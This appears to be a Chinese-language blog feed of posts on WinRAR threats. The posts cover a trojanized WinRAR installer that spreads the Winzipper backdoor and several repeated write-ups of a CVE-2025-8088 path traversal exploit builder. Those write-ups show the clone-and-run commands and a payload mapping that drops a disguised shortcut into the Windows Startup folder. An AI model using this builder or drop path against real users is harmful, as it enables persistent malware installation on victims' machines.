WinRAR on 办公AI智能小助手

深度解析：分发Winzipper后门的特洛伊化WinRAR安装程序

Mon, 12 Jan 2026 11:28:12 +0800

深度解析：分发Winzipper后门的特洛伊化WinRAR安装程序

威胁级别：高 类型：分析报告

这份详细的分析报告揭示了一场利用特洛伊化的WinRAR安装程序分发Winzipper后门恶意软件的恶意活动。多层解包和动态分析揭示了该恶意软件如何隐藏在合法安装程序背后以逃避检测并建立持久性，报告同时提供了明确的威胁指标和缓解建议。

WinRAR路径遍历漏洞CVE-2025-8088利用工具详解

Sun, 02 Nov 2025 21:26:35 +0800

CVE-2025-8088 WinRAR路径遍历工具

⚠ 此工具仅用于教育目的。严禁在受控环境之外未经授权使用。

这是一个Python脚本，利用WinRAR中的路径遍历漏洞CVE-2025-8088，通过生成恶意存档文件将可执行载荷放入Windows启动文件夹，使用多个相对目录级别确保无论解压位置如何都能可靠执行。

WinRAR路径遍历漏洞CVE-2025-8088利用分析

Sat, 01 Nov 2025 13:59:18 +0800

CVE-2025-8088-WinRAR构建器

一个针对WinRAR漏洞（CVE-2025-8088）的概念验证利用程序，影响7.12及以下版本

🚀 工作原理

创建包含其他有效载荷的Rar嵌入文件
使用多ADS流🔄 - 附加具有不同路径遍历深度的有效载荷流
操纵RAR头文件⚙️ - 修改存档结构以利用路径遍历漏洞
将有效载荷投递到启动文件夹📂 - 在解压时尝试将有效载荷写入Windows启动文件夹

🛠️ 使用方法

克隆仓库

1
2

git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder

准备有效载荷

`1`	`mkdir payloads`

将有效载荷添加到该文件夹（exe、dll、lnk等）
在脚本中修改PAYLOAD_MAPPING

# 2. 将我们的有效载荷映射到相应的目标位置
#   格式：(payloads_dir中的文件名, 目标提取路径)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # 有效载荷1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # 有效载荷2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # 有效载荷3
    # 添加你自己的有效载荷
]

运行利用程序

`1`	`python builder.py`

🔄 执行流程

受害者使用易受攻击的WinRAR（≤7.12）解压RAR文件

有效载荷被写入目标文件夹，例如：

`1`	`AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\`

在下次重启时➡️有效载荷自动执行

📋 要求

Windows操作系统🪟
Python 3.x🐍
已安装WinRAR

WinRAR路径遍历漏洞CVE-2025-8088利用工具详解

Thu, 23 Oct 2025 15:14:53 +0800

CVE-2025-8088 WinRAR路径遍历工具

⚠ 此工具仅用于教育目的。严禁在受控环境之外进行未经授权的使用。

这是一个Python脚本，利用CVE-2025-8088（WinRAR中的路径遍历漏洞），通过生成恶意压缩包，将可执行载荷放入Windows启动文件夹，使用多个相对目录级别确保无论解压位置如何都能可靠执行。

WinRAR路径遍历漏洞利用详解(CVE-2025-8088)

Thu, 23 Oct 2025 15:06:49 +0800

CVE-2025-8088-WinRAR构建器

针对影响7.12及更低版本WinRAR漏洞(CVE-2025-8088)的POC利用程序

🚀 工作原理

创建包含其他载荷的RAR嵌入文件
使用多ADS流🔄 - 附加具有不同路径遍历深度的载荷流
操作RAR头文件⚙️ - 修改存档结构以利用路径遍历漏洞
将载荷投放至启动文件夹📂 - 在解压时尝试将载荷写入Windows启动文件夹

🛠️ 使用方法

克隆仓库

1
2

git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder

准备载荷

`1`	`mkdir payloads`

将载荷添加到该文件夹（exe、dll、lnk等）
修改脚本中的PAYLOAD_MAPPING

# 2. 将我们的载荷映射到相应的目标位置
#   格式：(payloads_dir中的文件名，目标提取路径)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # 载荷1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # 载荷2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # 载荷3
    # 添加你自己的载荷
]

运行利用程序

`1`	`python builder.py`

🔄 执行流程

受害者使用易受攻击的WinRAR（≤7.12）解压RAR文件

载荷被写入目标文件夹，例如：

`1`	`AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\`

下次重启时➡️载荷自动执行

📋 要求

Windows操作系统🪟
Python 3.x🐍
已安装WinRAR

WinRAR路径遍历漏洞CVE-2025-8088利用工具详解

Thu, 25 Sep 2025 21:47:55 +0800

CVE-2025-8088 WinRAR路径遍历工具

⚠ 此工具仅用于教育目的。严禁在受控环境之外进行未经授权的使用。

这是一个Python脚本，利用WinRAR中的路径遍历漏洞CVE-2025-8088，通过生成恶意压缩包，使用多级相对目录将可执行载荷放置到Windows启动文件夹中，确保无论解压位置如何都能可靠执行。

WinRAR路径遍历漏洞CVE-2025-8088利用工具详解

Thu, 25 Sep 2025 02:19:08 +0800

CVE-2025-8088 WinRAR路径遍历工具

⚠ 本工具仅用于教育目的。严禁在受控环境之外进行未经授权的使用。

这是一个Python脚本，利用WinRAR中的路径遍历漏洞CVE-2025-8088，通过生成恶意压缩包将可执行载荷放置到Windows启动文件夹中。该工具使用多级相对目录层级确保无论解压位置如何都能可靠执行。